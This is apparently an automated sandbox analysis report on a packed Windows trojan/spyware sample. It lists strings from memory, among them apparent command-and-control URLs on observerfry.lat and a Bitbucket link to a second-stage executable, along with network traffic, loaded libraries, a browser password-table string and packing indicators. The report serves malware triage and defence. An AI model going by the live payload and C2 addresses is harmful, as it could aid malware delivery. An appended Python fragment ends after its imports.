Source: zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/D
Source: zLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/Q=
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: zLP3oiwG1g.exe, 00000000.00000002.1887616838.00000000001BA000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeT2
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exex
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1393576879.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000037C000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: zLP3oiwG1g.exe, 00000000.00000003.1470542881.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1419335143.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396948693.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396086235.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396513281.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1470979861.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445721130.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396336946.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/))
                Source: zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1444894119.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418508560.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1420455624.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418683409.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/H(
                Source: zLP3oiwG1g.exe, 00000000.00000003.1418572620.000000000038C000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000036D000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000037C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api&04
                Source: zLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: zLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/s
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apin.txtPK
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: zLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.10:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.10:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.67.100:443 -> 192.168.2.10:49780 version: TLS 1.2

System Summary
Source: zLP3oiwG1g.exe | Static PE information: section name:
Source: zLP3oiwG1g.exe | Static PE information: section name: .rsrc
Source: zLP3oiwG1g.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_003875CA | 0_3_003875CA
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_003734C0 | 0_3_003734C0
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_003302B4 | 0_3_003302B4
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0032D795 | 0_3_0032D795
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0032AAE5 | 0_3_0032AAE5
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0032DF51 | 0_3_0032DF51
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_00343401 | 0_3_00343401
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_00345809 | 0_3_00345809
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_00345966 | 0_3_00345966
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_003434A2 | 0_3_003434A2
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0038AFCB | 0_3_0038AFCB
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028
Source: zLP3oiwG1g.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: zLP3oiwG1g.exe | Static PE information: Section: ZLIB complexity 0.9973311750856164
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@4/4
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7300
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ddc84286-a223-436f-8dbb-585c1ae4bd03
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: zLP3oiwG1g.exe, 00000000.00000003.1368239815.0000000005157000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396875852.00000000051CF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1369941304.000000000513B000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396513281.0000000005139000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: zLP3oiwG1g.exe | Virustotal: Detection: 57%
Source: zLP3oiwG1g.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | File read: C:\Users\user\Desktop\zLP3oiwG1g.exe
Source: unknown | Process created: C:\Users\user\Desktop\zLP3oiwG1g.exe "C:\Users\user\Desktop\zLP3oiwG1g.exe"
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Section loaded: version.dll
Source: zLP3oiwG1g.exe | Static file information: File size 2994688 > 1048576
Source: zLP3oiwG1g.exe | Static PE information: Raw size of hzyqibdm is bigger than: 0x100000 < 0x2b3200

Data Obfuscation
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Unpacked PE file: 0.2.zLP3oiwG1g.exe.3b0000.0.unpack :EW;.rsrc :W;.idata :W;hzyqibdm:EW;ehrkmnwb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hzyqibdm:EW;ehrkmnwb:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: zLP3oiwG1g.exe | Static PE information: real checksum: 0x2e5847 should be: 0x2e57e8
Source: zLP3oiwG1g.exe | Static PE information: section name:
Source: zLP3oiwG1g.exe | Static PE information: section name: .rsrc
Source: zLP3oiwG1g.exe | Static PE information: section name: .idata
Source: zLP3oiwG1g.exe | Static PE information: section name: hzyqibdm
Source: zLP3oiwG1g.exe | Static PE information: section name: ehrkmnwb
Source: zLP3oiwG1g.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0037F93D push edx; retn 0051h | 0_3_0037F96A
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0037E13B push ecx; ret | 0_3_0037E152
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_0037E998 push eax; retf | 0_3_0037E99A
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Code function: 0_3_00381646 push ecx; retf | 0_3_0038166C
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E998 push eax; retf 0_3_0037E99A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E998 push eax; retf 0_3_0037E99A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_00381666 push ecx; retf 0_3_0038166C
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_00381646 push ecx; retf 0_3_0038166C
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037D7F4 push esi; retf 0_3_0037D7F7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
Source: zLP3oiwG1g.exe - Static PE information: section name: (empty as rendered), entropy: 7.979217064192899 (close to the 8.0 maximum, consistent with compressed or encrypted content in the unnamed section)
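The static findings above (an unprintable section name, a CheckSum mismatch, an entry point inside .taggant, a section at near-maximum entropy, and section rights that differ between the file and the dump) are exactly the checks a packer-triage script performs. The following is an added Python example, not code from the report or from the sample: it builds a constructed minimal PE32 (section names, contents, rights and the 0x1234 checksum are invented for the demo) and runs those checks with only the standard library. The checksum routine follows the imagehlp CheckSumMappedFile algorithm; everything else is plain header parsing.

```python
import hashlib
import math
import struct
from collections import Counter

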